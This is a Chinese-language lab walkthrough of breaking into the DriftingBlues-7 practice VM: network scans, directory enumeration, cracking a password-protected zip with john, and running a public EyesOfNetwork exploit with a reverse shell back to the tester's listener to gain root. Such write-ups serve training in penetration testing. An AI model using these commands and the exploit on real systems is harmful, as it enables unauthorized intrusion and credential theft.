关于我渗透driftingblues-7靶机这档事

admin 2022年11月11日18:51:50关于我渗透driftingblues-7靶机这档事已关闭评论202 views字数 1138阅读3分47秒阅读模式

Driftingblues7靶场笔记

apl
首先配置靶机,可以设置为桥接模式,通过MAC地址去发现IP

关于我渗透driftingblues-7靶机这档事

Found

arp 172.16.10.0/24
或 netdiscover -i 172.16.10.0/24

关于我渗透driftingblues-7靶机这档事

利用nmap进行第一步扫描,查看开放端口
首先进行开放端口 nmap -n -sS -p- 172.16.10.184

关于我渗透driftingblues-7靶机这档事

扫描靶机详细信息,进一步扫描
nmap -p- -sC -sV --min-rate=1000 172.16.10.184

关于我渗透driftingblues-7靶机这档事

Dirb

通过上一步信息收集,发现开放66端口为python服务器
利用dirb进行对靶机66端口进行目录枚举

apl
dirb http://172.16.10.184:66 -X .html .txt .bak /usr/share/wordlists/dirb/*

关于我渗透driftingblues-7靶机这档事

关于我渗透driftingblues-7靶机这档事

发现了第一个特殊的txt文件,将其下载下来查看,发现查看到flag

关于我渗透driftingblues-7靶机这档事

将.bash_history也下载下来查看
wget http://172.16.10.184:66/.bash_history

关于我渗透driftingblues-7靶机这档事

这结束了吗?我不这么认为,因为从bash历史文件可以看出,该机器的作者已经从另一台计算机复制了根标志并重命名了它

继续进行收集,更换字典/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt,这里需要花费挺长的时间,最后发现eon目录,进行下载

关于我渗透driftingblues-7靶机这档事

关于我渗透driftingblues-7靶机这档事

发现是一个base64文件,进行查看还是存在乱码

关于我渗透driftingblues-7靶机这档事

经过查看,发现是PK头,猜测是一个zip文件

利用一个在线网址破解:https://base64.guru/converter/decode/file

关于我渗透driftingblues-7靶机这档事

john

通过上一步将zip文件下载下来,发现为加密文件,利用zipjohn进行破解

apl
zcat /usr/share/wordlists/rockyou.txt.gz > zidian.txt
zip2john application.zip | tee hash (输出到hash文件)
john --wordlist=zidian.txt hash

关于我渗透driftingblues-7靶机这档事

infiltration

网络之眼的版本似乎有一个漏洞,进行查阅和测试
https://www.exploit-db.com/exploits/48025.因此,我决定在我的工作目录中复制该漏洞并运行它

利用kali进行搜集存在EyesOfNetwork漏洞

关于我渗透driftingblues-7靶机这档事

发现可利用漏洞文件48025.txt

关于我渗透driftingblues-7靶机这档事

利用此exploit脚本进行漏洞利用,成功getshell
python3 exploit.py https://172.16.10.184 -ip 172.16.10.200 -port 3333

关于我渗透driftingblues-7靶机这档事

成功利用root身份获得了最终的flag

关于我渗透driftingblues-7靶机这档事

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月11日18:51:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于我渗透driftingblues-7靶机这档事https://cn-sec.com/archives/752223.html